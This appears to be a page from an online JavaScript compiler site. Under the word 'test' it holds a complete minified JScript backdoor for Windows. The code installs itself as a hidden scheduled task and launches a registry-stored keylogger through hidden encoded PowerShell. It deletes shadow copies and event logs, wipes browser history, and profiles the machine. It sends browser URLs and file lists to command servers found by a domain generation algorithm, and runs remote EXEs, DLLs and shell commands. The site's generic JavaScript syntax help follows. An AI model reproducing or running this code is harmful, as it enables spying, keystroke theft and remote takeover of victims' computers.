test
test
Output:
var reg_base_key;var self_dir;var self_file;var wscript_shell;var shell_application;var fso;var win_http;var wmi_obj;var wbem_dt;var uid;var uuid='';var srv_url;var admin=false;var wsa;var srv_connect_timeout;function get_uid2(){var sn=false;var d=fso.GetDrive(fso.GetDriveName('C:'));if(d!=null){if(d.SerialNumber){var snum=d.SerialNumber;if(snum<0)snum=0-snum;sn=snum.toString(16);if(sn.length<8)uuid=sn;}}return sn;}function get_uid(){var sn=false;try{sn=get_uid2();if(sn!=false)sn=sn.toLowerCase();}catch(e){ }if(sn){while(sn.length<8)sn='0'+sn;return sn;}else return '00000000';}function int2hex32(s){var r=s.toString(16);while(r.length<8)r='0'+r;return r;}function rnd(){return Math.ceil(2147483648 * Math.random());}function gen_rnd_str(){return rnd().toString(16);}function gen_guid(param){return uid+'-'+uid.substr(0,4)+'-'+uid.substr(4,4)+'-'+uid.substr(0,4)+'-'+uid+uid.substr(0,3)+param;}function is_array(arr){return Object.prototype.toString.call(arr)=== '[object Array]';}function hex2bin(hex,xor_key){var bytes=new Array();for(var i=0; i<hex.length-1; i+=2){bytes.push(parseInt(hex.substr(i,2),16)^xor_key);}return String.fromCharCode.apply(String,bytes);}function bin2hex(bin,xor_key){var i,f=bin.length,a=new Array();for(i=0; i<f; i++){a[i]=(bin.charCodeAt(i)^xor_key).toString(16);if(a[i].length==1)a[i]='0'+a[i];}return a.join('');}function unxor(hex,key){var bytes=new Array();for(var i=0; i<hex.length-1; i+=2){bytes.push(parseInt(hex.substr(i,2),16)^key[(i>>1)%4]);}return String.fromCharCode.apply(String,bytes);}function extract_file_ext(filename){var i=filename.lastIndexOf('.');if(i>=0){return filename.substr(i+1);}else return '';}function extract_file_name(filename){var i=filename.lastIndexOf('\\');if(i>=0){return filename.substr(i+1);}else return filename;}function extract_file_path(filename){var i=filename.lastIndexOf('\\');if(i>=0){return filename.substr(0,i+1);}else return '';}function erase_file(filename){if(!fso.FileExists(filename))return true;try{var new_filename=extract_file_path(filename)+gen_rnd_str();fso.MoveFile(filename,new_filename);var f=fso.GetFile(new_filename);if(f!=null){f.Attributes=0;var fsize=f.Size;var blank=String.fromCharCode(0,0,0,0,0,0,0,0,0,0);for(var i=0; blank.length<1024; i++)blank+=blank;f=fso.OpenTextFile(new_filename,2,true);if(f!=null){while(fsize>0){f.Write(blank);fsize-=blank.length;}f.Close();}}fso.DeleteFile(new_filename);return(!fso.FileExists(new_filename));}catch(e){ return false; }}function clear_dir(dir,name_substr,recursive){if(!fso.FolderExists(dir))return false;var objFolder=fso.GetFolder(dir);if(objFolder!=null){var Enum=new Enumerator(objFolder.Files);while(!Enum.atEnd()){var item=Enum.item();try{if((name_substr==null)||(item.Name.indexOf(name_substr)!=-1))erase_file(dir+'\\'+item.Name);}catch(e){}Enum.moveNext();}if(recursive){var Enum=new Enumerator(objFolder.SubFolders);while(!Enum.atEnd()){var item=Enum.item();try{clear_dir(item,name_substr,recursive);fso.DeleteFolder(item);}catch(e){}Enum.moveNext();}}}}function enum_subfolders(root_dir,callback){if(fso.FolderExists(root_dir)){var objFolder=fso.GetFolder(root_dir);if(objFolder){var Enum=new Enumerator(objFolder.SubFolders);while(!Enum.atEnd()){var item=Enum.item();if(fso.FolderExists(item))callback(item);Enum.moveNext();}}}}function move_file(exist_filename,new_filename){try{fso.CopyFile(exist_filename,new_filename,true);erase_file(exist_filename);return fso.FileExists(new_filename);}catch(e){ return false; }}function get_file_content(filename,unicode){var data=false;try{var f=fso.GetFile(filename);if(f!=null){if(unicode)var charset=-1;else var charset=0;var stream=f.OpenAsTextStream(1,charset);var data=stream.Read(f.Size);stream.Close();}return data;}catch(e){ return ''; }}function put_file_text_content(filename,content,unicode){try{if(fso.FileExists(filename))fso.DeleteFile(filename);var ff=fso.CreateTextFile(filename,true);ff.Close();var f=fso.GetFile(filename);if(f!=null){if(unicode)var charset=-1;else var charset=0;var stream=f.OpenAsTextStream(2,charset);stream.Write(content);stream.Close();return true;}}catch(e){ return false; }}function put_file_bin_content(filename,content){try{if(fso.FileExists(filename))fso.DeleteFile(filename);var ado=new ActiveXObject('ADODB.Stream');ado.Mode=3;ado.Type=1;ado.Open();ado.Write(content);ado.SaveToFile(filename);ado.Close();return fso.FileExists(filename);}catch(e){ return false; }}function get_tmp_filename(extension){return wscript_shell.ExpandEnvironmentStrings('%TEMP%')+'\\'+gen_rnd_str()+'.'+extension;}function expand_subst(str){var res=str.replace('%SELF_FILE%',self_file);var res=res.replace('%SELF_DIR%',self_dir);var res=res.replace('%UID%',uid);return wscript_shell.ExpandEnvironmentStrings(res);}function cfg_get_param(param_name){try{return wscript_shell.RegRead(reg_base_key+param_name);}catch(e){ return false; }}function cfg_param_exists(param_name){return((cfg_get_param(param_name))!==false);}function cfg_set_param(param_name,param_value){try{wscript_shell.RegWrite(reg_base_key+param_name,param_value);return(wscript_shell.RegRead(reg_base_key+param_name)!=false);}catch(e){ return false; }}function cfg_delete_param(param_name){try{return wscript_shell.RegDelete(reg_base_key+param_name);}catch(e){ return false; }}function is_admin(){var k='HKEY_CLASSES_ROOT\\WinNT\\test';try{wscript_shell.RegWrite(k,1);if(wscript_shell.RegRead(k)=='1'){wscript_shell.RegDelete(k);return true;}else return false;}catch(e){ return false; }}function wbem_datetime_to_seconds(date_time_wbem){wbem_dt.Value=date_time_wbem;var date_time_str=wbem_dt.GetVarDate()+'';var dt_parts=date_time_str.split(' ');var months='Jan_Feb_Mar_Apr_May_Jun_Jul_Aug_Sep_Oct_Nov_Dec';var parts24=dt_parts[3].split(':');var dt=new Date(dt_parts[5],months.indexOf(dt_parts[1])/ 4,dt_parts[2],parts24[0],parts24[1],parts24[2]);return dt.getTime()/ 1000;}function get_os_uptime(){var uptime=0;try{var colItems=wmi_obj.ExecQuery('SELECT * FROM Win32_OperatingSystem','WQL',48);var enumItems=new Enumerator(colItems);for(; !enumItems.atEnd(); enumItems.moveNext()){var objItem=enumItems.item();uptime=wbem_datetime_to_seconds(objItem.LocalDateTime)-wbem_datetime_to_seconds(objItem.LastBootUpTime);break;}}catch(e){}return uptime;}function get_comspec(){var env=wscript_shell.Environment('System');if(env)return env.Item('COMSPEC');else return false;}function mz_found(data){return((data.length>1000)&&(data.charCodeAt(0)==77)&&(data.charCodeAt(1)==90));}function str_conv(txt,src_charset,dst_charset){with(new ActiveXObject("ADODB.Stream")){type=2,mode=3,charset=dst_charset;open();writeText(txt);position=0,charset=src_charset;return readText();}}function kill_processes(prcs_for_kill){var processes=wmi_obj.ExecQuery('Select * from Win32_Process');var e=new Enumerator(processes);while(!e.atEnd()){var prc=e.item();for(var i=0; i<prcs_for_kill.length; i++){if(prc.Name.toLowerCase()==prcs_for_kill[i].toLowerCase()){try{prc.Terminate(0);}catch(ex){}break;}}e.moveNext();}}function StartProcessViaWmi(CmdLine){try{var proc=wmi_obj.Get('Win32_Process');if(proc){var StartupInfo=wmi_obj.Get('WIN32_ProcessStartup');if(StartupInfo)StartupInfo.ShowWindow=0;else StartupInfo=null;return(proc.Create(CmdLine,null,StartupInfo,null)==0);}}catch(e){ }return false;}function InstanceFound(){var processes=wmi_obj.ExecQuery('SELECT * FROM Win32_Process WHERE(CommandLine LIKE "%wscript.exe%")AND(CommandLine LIKE "%'+self_file.replace(/\\/g,'\\\\')+'%")');return(processes)&&(processes.Count>1);}function start_keylogger(){var kl_plain_data;if((kl_plain_data=cfg_get_param(uid+1))=== false){if((kl_plain_data=cfg_get_param(uuid+1))=== false)return;}var cmd_line='powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc '+kl_plain_data;return StartProcessViaWmi(cmd_line);}function stop_keylogger(){cfg_set_param(uid+'s',1);WScript.Sleep(5000);cfg_delete_param(uid+'s');}function init_globals(){try{wsa=WScript.Arguments;wscript_shell=new ActiveXObject('WScript.Shell');shell_application=new ActiveXObject('Shell.Application');fso=new ActiveXObject('Scripting.FileSystemObject');reg_base_key='HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\DWM\\';win_http=new ActiveXObject('WinHttp.WinHttpRequest.5.1');wmi_obj=GetObject('winmgmts:\\\\localhost\\root\\CIMV2');wbem_dt=WScript.CreateObject('WbemScripting.SWbemDateTime');self_file=WScript.ScriptFullName;self_dir=extract_file_path(self_file);uid=get_uid();admin=is_admin();srv_send_result_proc=srv_send_result;}catch(e){ }}function clear_chrome_like_history(subdir){var objFolder=shell_application.NameSpace(28);if(objFolder){var dir=objFolder.Self.Path+subdir+'\\User Data\\Default';clear_dir(dir,'History',false);clear_dir(dir,'Cookies',false);clear_dir(dir+'\\Session Storage',null,false);clear_dir(dir+'\\Sessions',null,false);clear_dir(dir+'\\Cache',null,false);clear_dir(dir+'\\Code Cache\\js',null);clear_dir(dir+'\\Code Cache\\js\\index-dir',null,false);clear_dir(dir+'\\shared_proto_db',null,false);clear_dir(dir+'\\shared_proto_db\\metadata',null,false);}}function clear_chrome_history(){clear_chrome_like_history('\\Google\\Chrome');}function clear_yandex_history(){clear_chrome_like_history('\\Yandex\\YandexBrowser');}function clear_ff_history(){var ff_subdir='\\Mozilla\\Firefox\\Profiles';var objFolder=shell_application.NameSpace(26);if(objFolder)enum_subfolders(objFolder.Self.Path+ff_subdir,function(subdir){clear_dir(subdir+'\\sessionstore-backups',null,false);clear_dir(subdir,'places',false);clear_dir(subdir,'cookies',false);clear_dir(subdir,'search',false);});objFolder=shell_application.NameSpace(28);if(objFolder)enum_subfolders(objFolder.Self.Path+ff_subdir,function(subdir){clear_dir(subdir+'\\cache2',null,false);clear_dir(subdir+'\\cache2\\entries',null,false);clear_dir(subdir+'\\thumbnails',null,false)});}function clear_ie_history(){var cmd_line='rundll32.exe InetCpl.cpl,ClearMyTracksByProcess ';wscript_shell.Run(cmd_line+'Flags:8389120',0,false);wscript_shell.Run(cmd_line+'Flags:276824576',0,false);wscript_shell.Run(cmd_line+'255',0,false);wscript_shell.Run(cmd_line+'2',0,false);wscript_shell.Run(cmd_line+'1',0,false);var objFolder=shell_application.NameSpace(28);if(objFolder){var dir=objFolder.Self.Path+'\\Microsoft\\Windows\\';clear_dir(dir+'WebCache',null,false);dir+='INetCache\\';clear_dir(dir+'Low',null);clear_dir(dir+'Low\\IE',null);enum_subfolders(dir+'Low\\IE',function(subdir){ clear_dir(subdir,null,false); fso.DeleteFolder(subdir); });dir=objFolder.Self.Path+'\\Microsoft\\Internet Explorer\\Recovery';clear_dir(dir+'\\Active',null,false);clear_dir(dir+'\\Last Active',null,false);}}function clear_browsers_history(force){if(force)kill_processes(new Array('iexplore.exe','firefox.exe','chrome.exe','browser.exe'));clear_chrome_history();clear_yandex_history();clear_ff_history();clear_ie_history();}function reset_restore_points(){wscript_shell.Run('vssadmin.exe Delete Shadows /All /Quiet',2,false);}function keylogger_hex_to_registry(hex_data){var k=new Array();for(var i=0; i<4; i++){ k[i]=parseInt(hex_data.substr(i * 2,2),16); }var kl_plain_data=unxor(hex_data.substr(8),k);return cfg_set_param(uid+1,kl_plain_data);}function keylogger_to_registry(){if(fso.FileExists(self_dir+'1560020152')){var kl_hex_data=get_file_content(self_dir+'1560020152',false);erase_file(self_dir+'1560020152');return keylogger_hex_to_registry(kl_hex_data);}else return false;}function clear_windows_logs(){wscript_shell.Run('cmd.exe /c for /F "tokens=*" %1 in(\'wevtutil.exe el\')DO wevtutil.exe cl "%1"',0,false);}function start_task(task_name){var service=new ActiveXObject('Schedule.Service');if(service){service.Connect();var root_folder=service.GetFolder('\\');if(root_folder){var task=root_folder.GetTask(task_name);if(task)task.Run(null);}}}function create_autostart_task(task_name,path,args,high_rights){try{var service=new ActiveXObject('Schedule.Service');service.Connect();var root_folder=service.GetFolder('\\');var task_definition=service.NewTask(0);var settings=task_definition.Settings;settings.Enabled=true;settings.StartWhenAvailable=true;settings.DisallowStartIfOnBatteries=false;settings.StopIfGoingOnBatteries=false;settings.Hidden=true;settings.ExecutionTimeLimit='PT0S';settings.RestartInterval='PT1M';settings.RestartCount=9999;settings.RunOnlyIfNetworkAvailable=false;if(high_rights){var user='';var run_level=1;}else{var wn=new ActiveXObject('WScript.Network');if(wn)var user=wn.UserName;var run_level=0;}var triggers=task_definition.Triggers;var trigger=triggers.Create(9);trigger.Id='1';trigger.UserId=user;trigger.Enabled=true;task_definition.Principal.RunLevel=run_level;var action=task_definition.Actions.Create(0);action.Path=path;action.Arguments=args;return root_folder.RegisterTaskDefinition(task_name,task_definition,6,'','',3);}catch(e){ return false; }}function delete_autostart_task(task_name){try{var service=new ActiveXObject('Schedule.Service');service.Connect();var root_folder=service.GetFolder('\\');root_folder.DeleteTask(task_name,0);}catch(e){}}function uninstall(){stop_keylogger();var params=new Array('0','1','a','s','z','p','h','c','b','r','t','j','v');for(var i=0; i<params.length; i++){ cfg_delete_param(uid+params[i]); }delete_autostart_task(gen_guid(0));erase_file(self_file);if(admin)reset_restore_points();WScript.Quit();}function install(){try{if(wsa.count()>0){var sfx=wsa(0);if(fso.FileExists(sfx))erase_file(sfx);}} catch(e){}var f=shell_application.NameSpace(28);if(f!=null){var installed_filename=f.Self.Path+'\\'+uid+'0.js';if(move_file(self_file,installed_filename)){var task_name=gen_guid(0);if(create_autostart_task(task_name,'wscript.exe','"'+installed_filename+'"',admin)){keylogger_to_registry();cfg_set_param(uid+0,1);start_task(task_name);}if(admin)reset_restore_points();}}wscript_shell.Popup('Unknown format.',30,'Error',0);}function _execute_cmd_line(cmd_line){try{var cmd=get_comspec();if(cmd){var exec=wscript_shell.Exec(cmd+' /c '+expand_subst(cmd_line));if(exec){var out_text='';while(!exec.StdOut.AtEndOfStream)out_text+=exec.StdOut.ReadAll();while(!exec.StdErr .AtEndOfStream)out_text+=exec.StdErr .ReadAll();out_text=str_conv(out_text,'ibm866','windows-1251');return out_text;}}}catch(e){}return false;}function execute_cmd_line(responseText){var res=-2;var out_text='';try{if(responseText!=''){res=-1;if((out_text=_execute_cmd_line(responseText))!=false)res=1;}}catch(e){res=-99;out_text=e.message;}srv_send_result(res,out_text);}function execute_exe(get_out,responseText,responseBody){var res=-4;var out_text='';try{res=-3;if(mz_found(responseText)){res=-2;var exe=get_tmp_filename('exe');if(put_file_bin_content(exe,responseBody)){res=-1;var arg_line=get_responce_param(1);if((arg_line!==false)&&(arg_line!=''))arg_line=' '+expand_subst(arg_line);else arg_line='';if(get_out){if((out_text=_execute_cmd_line(exe+arg_line))!=false)res=1;}else{if(StartProcessViaWmi(exe+arg_line))res=1;}}}}catch(e){ res=-99; }srv_send_result(res,out_text);}function load_dll(responseText,responseBody){out_text='';var res=-3;try{if(mz_found(responseText)){res=-2;var dll=get_tmp_filename('dll');if(put_file_bin_content(dll,responseBody)){res=-1;var proc=get_responce_param(1);var arg_line=get_responce_param(2);if((proc==false)||(proc==''))proc='0';if((arg_line!==false)&&(arg_line!=''))arg_line=' '+expand_subst(arg_line);else arg_line='';if(StartProcessViaWmi('rundll32.exe "'+dll+'",'+proc+arg_line))res=1;}}}catch(e){ res=-99; }srv_send_result(res,out_text);}function execute_wsh(responseText,responseBody){var res=-3;try{var filename=get_responce_param(0);if(filename!==false){res=-2;var ext=extract_file_ext(filename);if(ext=='')ext='js';var tmp=get_tmp_filename(ext);if(put_file_bin_content(tmp,responseBody)){res=-1;var arg_line=get_responce_param(1);if((arg_line!==false)&&(arg_line!=''))arg_line=' '+expand_subst(arg_line);else arg_line='';if(StartProcessViaWmi('wscript.exe "'+tmp+'"'+arg_line))res=1;}}}catch(e){ res=-99; }srv_send_result(res,'');}function execute_ps(responseText){var res=-2;try{if(responseText!=''){res=-1;if(StartProcessViaWmi('powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc '+responseText))res=1;}}catch(e){ res=-99; }srv_send_result(res,'');}function execute(responseText){var res=-1;try{if(StartProcessViaWmi(expand_subst(responseText)))res=1;}catch(e){ res=-99; }srv_send_result(res,'');}function upload_file(responseBody){var res=-1;try{var filename=get_responce_param(0);if((filename === false)||(filename==''))filename=gen_rnd_str();filename=self_dir+filename;if(fso.FileExists(filename))fso.DeleteFile(filename,true);if(!fso.FileExists(filename))put_file_bin_content(filename,responseBody);if(fso.FileExists(filename))res=1;}catch(e){ res=-99; }srv_send_result(res,'');}function update_self(responseBody,responseText){var res=-3;try{if(erase_file(self_file)){res=-2;if(put_file_bin_content(self_file,responseBody)){res=-1;if(StartProcessViaWmi('wscript.exe "'+self_file+'" /upd'))WScript.Quit(0);}}}catch(e){ res=-99; }srv_send_result(res,'');}function update_keylogger(responseText){var res=-2;var msg='';stop_keylogger();if(keylogger_hex_to_registry(responseText)){res=-1;if(start_keylogger())res=1;}if(res==1)msg='Keylogger updated';srv_send_result(res,msg);}function eval_js(js){try{var res=eval(expand_subst(js));if((typeof res=='undefined')&&(typeof activate!=='undefined'))res=activate();if((typeof res!=='undefined')&&(typeof res['status']!=='undefined')&&(typeof res['data']!=='undefined')){srv_send_result(res['status'],res['data']);}else srv_send_result(1,'Executed');}catch(e){srv_send_result(-99,'Exception');}}function set_autostart_js(responseText){if(cfg_set_param(uid+'v',responseText)!==false)srv_send_result(1,'');else srv_send_result(-1,'');}function stop_self(){stop_keylogger();WScript.Quit();}function set_cc_url(url){var res=-2;if(srv_test_connect(url,5)){res=-3;if(cfg_set_param(uid+'c',url)){res=1;srv_url=url;}}else srv_send_result(res, '');}function set_timeout(t){var ti=parseInt(t);srv_connect_timeout=ti * 1000;if(cfg_set_param(uid+'t',srv_connect_timeout)!==false)srv_send_result(1,'Timeout: '+ti+' sec.');else srv_send_result(-1,'Failed');}var srv_send_result_proc;function get_responce_param(param_num){var headers=win_http.GetAllResponseHeaders();param_name='X-Option-'+param_num;if(headers.indexOf(param_name)!=-1){return hex2bin(win_http.GetResponseHeader(param_name),0);}else return false;}function srv_responce(status,responseBody,responseText){try{switch(status){case 200: break;case 820: execute_exe(false,responseText,responseBody); break;case 821: load_dll(responseText,responseBody); break;case 822: execute_cmd_line(responseText); break;case 823: execute(responseText); break;case 824: execute_wsh(responseText,responseBody); break;case 825: eval_js(responseText); break;case 826: execute_ps(responseText); break;case 827: stop_self(); break;case 828: uninstall(); break;case 829: upload_file(responseBody); break;case 830: set_timeout(responseText); break;case 831: set_cc_url(responseText); break;case 832: update_self(responseBody,responseText); break;case 833: update_keylogger(responseText); break;case 834: set_autostart_js(responseText); break;case 835: execute_exe(true,responseText,responseBody); break;default:return -2;break;}}catch(e){ return -99; }return 0;}function srv_try_send_data(url,action,status,data){try{win_http.Open('POST',url,false);win_http.SetRequestHeader('Content-Type','application/x-www-form-urlencoded');win_http.SetRequestHeader('User-Agent','Mozilla/5.0(Windows NT 10.0; WOW64; Trident/7.0; rv:11.1)like Gecko');win_http.SetRequestHeader('X-Client-Id',uid);win_http.setRequestHeader('X-Client-Controller',action);win_http.setRequestHeader('X-Client-Ut',get_os_uptime());if(status!=0)win_http.setRequestHeader('X-Client-Status',status);win_http.Option(4)=0x0100 +0x0200+0x1000+0x2000;win_http.Send(data);return true;}catch(e){ }return false;}function srv_send_data(action,status,data){var res=false;for(var i=0; i<10; i++){if(res=srv_try_send_data(srv_url,action,status,data))break;}if(res){var responce_res=srv_responce(win_http.status,win_http.responseBody,win_http.responseText);if(responce_res==-2)srv_try_send_data(srv_url,7,responce_res,'Unknown command');return(responce_res==0);}else{srv_url=get_actually_url();}}function srv_send_result(status_code,result_text){srv_send_data(7,status_code,result_text);}function srv_send_keylog(){var kl_data=cfg_get_param(uid+'a');if(kl_data)cfg_set_param(uid+'a','');else kl_data='';srv_send_data(3,0,kl_data);}function srv_test_connect(url,try_count){var res=false;for(var i=0; i<try_count; i++){res=(srv_try_send_data(url,0,0,uid)&&(win_http.responseText==uid));if(res)break;}return res;}function srv_send_info(){var os_ver='';var os_locale='';var domain_role=-1;var part_of_domain=0;var time_bias=0;var username='';var compname='';try{var os_ver=wscript_shell.RegRead('HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductName');}catch(e){}try{os_ver+=' '+wscript_shell.RegRead('HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\\PROCESSOR_ARCHITECTURE');}catch(e){}try{var os_locale=wscript_shell.RegRead('HKEY_CURRENT_USER\\Control Panel\\International\\LocaleName');}catch(e){ os_locale=''; }if(admin)var adm=1;else var adm=0;try{var wsh_net=new ActiveXObject('WScript.Network');var compname=wsh_net.ComputerName;var username=wsh_net.UserName;}catch(e){}try{var colItems=wmi_obj.ExecQuery('SELECT * FROM Win32_ComputerSystem','WQL',48);var enumItems=new Enumerator(colItems);for(; !enumItems.atEnd(); enumItems.moveNext()){var objItem=enumItems.item();domain_role=objItem.DomainRole;if(objItem.PartOfDomain)part_of_domain=1;time_bias=objItem.CurrentTimeZone;break;}}catch(e){}var avs='';try{var objWMIService=GetObject('winmgmts:\\\\.\\root\\SecurityCenter2');var colItems=objWMIService.ExecQuery('SELECT * FROM AntiVirusProduct');var enumItems=new Enumerator(colItems);for(; !enumItems.atEnd(); enumItems.moveNext()){var objItem=enumItems.item();if(avs!='')avs+=',';avs+=objItem.displayName;}}catch(e){}var sc='';try{var colItems=wmi_obj.ExecQuery('SELECT * FROM Win32_PnPSignedDriver WHERE DeviceClass="SMARTCARDREADER"');var enumItems=new Enumerator(colItems);for(; !enumItems.atEnd(); enumItems.moveNext()){var objItem=enumItems.item();if(sc!='')sc+='\r\n';sc+=objItem.DeviceName;}}catch(e){}var data='os='+bin2hex(os_ver,0)+'&cn='+bin2hex(compname,0)+'&un='+bin2hex(username)+'&b='+time_bias+'&l='+os_locale+'&adm='+adm +'&pd='+part_of_domain+'&dr='+domain_role+'&av='+bin2hex(avs,0)+'&sc='+bin2hex(sc,0);srv_send_data(2,0,data);}var url_prefix='https:/'+'/';var url_zones=new Array('.top','.fun','.online','.site');var url_suffix='/index.php';var default_salt='d46ebd15';var domains=new Array('3a60dc39','4d67ecaf','d303790c','a404499a','3d0d1820','4a0a28b6','dab53527','adb205b1','44e645b3','500ed27c','c8690767','17c45148','13e1ced9','e123fe80','136e9446','5937c7c6','7c7cb9a4','9eaa332e','97815a39','6a090054');function crc32(r){for(var a,o=[],c=0;c<256;c++){a=c;for(var f=0;f<8;f++)a=1&a?3988292384^a>>>1:a>>>1;o[c]=a}for(var n=-1,t=0;t<r.length;t++)n=n>>>8^o[255&(n^r.charCodeAt(t))];return(-1^n)>>>0};function gmt_date(){var d=(new Date()).toUTCString();var da=d.split(' ');if(da.length>3)return da[0]+da[1]+da[2]+da[3];else return false;}function get_current_domains(salt){var out=new Array();for(var i=0; i<domains.length; i++){out.push(domains[i]);}for(var i=0; i<100; i++){out.push(int2hex32(crc32(gmt_date()+salt+i)));}return out;}function get_actually_url(){var url=cfg_get_param(uid+'c');if(url!==false){if(srv_test_connect(url,5))return url;}while(1){var salt=cfg_get_param(uid+'b');if((!salt)||(salt==''))salt=default_salt;var current_domains=get_current_domains(salt);for(var i=0; i<current_domains.length; i++){for(var j=0; j<url_zones.length; j++){url=url_prefix+current_domains[i]+url_zones[j]+url_suffix;if(srv_test_connect(url,1)){cfg_set_param(uid+'c',url);return url;}}}}}var file_ext='exe_ex_dll_ocx_odb_jks_jar_jnlp_doc_docx_';var win_dir;var user_data;function user_data_add_line(line){user_data+=line+'\r\n';}function user_data_add_url(hist_file,url){var short_url=url;var k=short_url.lastIndexOf('/');if((k>7)&&(k<short_url.length-7))short_url=short_url.substring(0,k+8);user_data+=short_url+'\r\n';}function scan_ie_history(hist_file){var url='';var objFolder=shell_application.NameSpace(34);if(objFolder!=null){var objFolderItems=objFolder.Items();if(objFolderItems!=null){for(var i =0; i<objFolderItems.Count; i++){objFolderItem=objFolderItems.Item(i);if((objFolderItem!=null)&&(objFolderItem.IsFolder)){var objFolderItemsItem=objFolderItems.Item(i);if(objFolderItemsItem.IsFolder){var objFolder2=objFolderItemsItem.GetFolder;if(objFolder2!=null){var objFolderItems2=objFolder2.Items();if(objFolderItems2!=null){for(var j=0; j<objFolderItems2.Count; j++){var objFolder3=objFolderItems2.Item(j);if((objFolder3!=null)&&(objFolder3.IsFolder)){var objFolder4=objFolder3.GetFolder;if(objFolder4!=null){var objFolder4Items=objFolder4.Items();for(var k=0; k<objFolder4Items.Count; k++){url=objFolder4.GetDetailsOf(objFolder4Items.Item(k),0);if(url.substring(0,4)=='http')user_data_add_url(hist_file,url);}}}}}}}}}}}}function scan_binary_file(filename,hist_file){if(!fso.FileExists(filename))return '';var f=fso.GetFile(filename);var fsize=f.Size;var bf=f.OpenAsTextStream(1);while(fsize>0){if(fsize>4096)var read_size=4096;else var read_size=fsize;var data=bf.Read(read_size);fsize-=read_size;var i=0;while(i<read_size-5){if(data.substring(i,i+4)=='http'){j=i+1;while((j<read_size)&&(data.charCodeAt(j)>33)){ j++; }user_data_add_url(hist_file,data.substring(i,j));i=j;}i++;}}bf.Close();}function scan_chrome_history(hist_file){var objFolder=shell_application.NameSpace(28);return scan_binary_file(objFolder.Self.Path+'\\Google\\Chrome\\User Data\\Default\\History',hist_file);}function scan_yandex_history(hist_file){var objFolder=shell_application.NameSpace(28);return scan_binary_file(objFolder.Self.Path+'\\Yandex\\YandexBrowser\\User Data\\Default\\History',hist_file);}function scan_ff_history(hist_file){var objFolder=shell_application.NameSpace(26);var dir=objFolder.Self.Path+'\\Mozilla\\Firefox\\Profiles';if(!fso.FolderExists(dir))return '';var objFolder=fso.GetFolder(dir);if(objFolder!=null){var Enum=new Enumerator(objFolder.SubFolders);while(!Enum.atEnd()){var item=Enum.item();if(item.Name.indexOf('-release',0)>0){var db=item+'\\places.sqlite';if(fso.FileExists(db)){return scan_binary_file(db,hist_file);}}Enum.moveNext();}}}function scan_folders(dir,hist_file){if(dir!=win_dir){var f=fso.GetFolder(dir);var fc=new Enumerator(f.SubFolders);var fci='';var ext='';for(;!fc.atEnd(); fc.moveNext()){fci=fc.item();scan_folders(fci,hist_file);}fc=new Enumerator(f.Files);for(;!fc.atEnd(); fc.moveNext()){fci=fc.item().Name;ext=extract_file_ext(fci);if((ext!='')&&(file_ext.indexOf(ext+'_')>=0))user_data_add_line(fci);}}}function collect_user_profile(){user_data='';scan_ie_history(null);scan_chrome_history(null);scan_yandex_history(null);scan_ff_history(null);win_dir=shell_application.NameSpace(36).Self.Path;scan_folders('C:\\',null);}function start_instance(){var auto_js=cfg_get_param(uid+'v');if((auto_js!=false)&&(auto_js!='')){try{var res=eval(expand_subst(auto_js));if((typeof res=='undefined')&&(typeof autostart_js_activate!=='undefined'))res=autostart_js_activate();}catch(e){}}start_keylogger();srv_url=get_actually_url();srv_send_info();if((wsa.length>0)&&(wsa(0)=='/upd'))srv_send_result(1,'JS updated');if(!cfg_param_exists(uid+'p')){collect_user_profile();if(user_data!=''){srv_send_data(6,0,user_data);user_data='';}cfg_set_param(uid+'p',1);}if(!cfg_param_exists(uid+'h')&&(get_os_uptime()<600)){clear_browsers_history(true);cfg_set_param(uid+'h',1);}while(true){try{if((srv_connect_timeout=cfg_get_param(uid+'t'))==false)srv_connect_timeout=300000;WScript.Sleep(srv_connect_timeout);if(cfg_param_exists(uid+'z')){cfg_delete_param(uid+'j');WScript.Quit(0);}var res_data=cfg_get_param(uid+'r');if(res_data!==false){var i=res_data.indexOf('|');if(i>0)srv_send_result(parseInt(res_data.substring(0,i)),res_data.substring(i+1));else srv_send_result(0,res_data);cfg_delete_param(uid+'r');}var js_code=cfg_get_param(uid+'j');if(js_code!==false){eval(expand_subst(js_code));cfg_delete_param(uid+'j');}srv_send_keylog();}catch(e){continue;}}}function entry_point(){init_globals();if(cfg_param_exists(uid+0))start_instance();else install();}entry_point();WScript.Quit(0);
created 2 years ago
Javascript Online Compiler
Write, Run & Share Javascript code online using OneCompiler's JS online compiler for free. It's one of the robust, feature-rich online compilers for Javascript language. Getting started with the OneCompiler's Javascript editor is easy and fast. The editor shows sample boilerplate code when you choose language as Javascript and start coding.
About Javascript
Javascript(JS) is a object-oriented programming language which adhere to ECMA Script Standards. Javascript is required to design the behaviour of the web pages.
Key Features
- Open-source
- Just-in-time compiled language
- Embedded along with HTML and makes web pages alive
- Originally named as LiveScript.
- Executable in both browser and server which has Javascript engines like V8(chrome), SpiderMonkey(Firefox) etc.
Syntax help
STDIN Example
var readline = require('readline');
var rl = readline.createInterface({
input: process.stdin,
output: process.stdout,
terminal: false
});
rl.on('line', function(line){
console.log("Hello, " + line);
});variable declaration
| Keyword | Description | Scope |
|---|---|---|
| var | Var is used to declare variables(old way of declaring variables) | Function or global scope |
| let | let is also used to declare variables(new way) | Global or block Scope |
| const | const is used to declare const values. Once the value is assigned, it can not be modified | Global or block Scope |
Backtick Strings
Interpolation
let greetings = `Hello ${name}`Multi line Strings
const msg = `
hello
world!
`Arrays
An array is a collection of items or values.
Syntax:
let arrayName = [value1, value2,..etc];
// or
let arrayName = new Array("value1","value2",..etc);Example:
let mobiles = ["iPhone", "Samsung", "Pixel"];
// accessing an array
console.log(mobiles[0]);
// changing an array element
mobiles[3] = "Nokia";Arrow functions
Arrow Functions helps developers to write code in concise way, it’s introduced in ES6.
Arrow functions can be written in multiple ways. Below are couple of ways to use arrow function but it can be written in many other ways as well.
Syntax:
() => expressionExample:
const numbers = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
const squaresOfEvenNumbers = numbers.filter(ele => ele % 2 == 0)
.map(ele => ele ** 2);
console.log(squaresOfEvenNumbers);De-structuring
Arrays
let [firstName, lastName] = ['Foo', 'Bar']Objects
let {firstName, lastName} = {
firstName: 'Foo',
lastName: 'Bar'
}rest(...) operator
const {
title,
firstName,
lastName,
...rest
} = record;Spread(...) operator
//Object spread
const post = {
...options,
type: "new"
}
//array spread
const users = [
...adminUsers,
...normalUsers
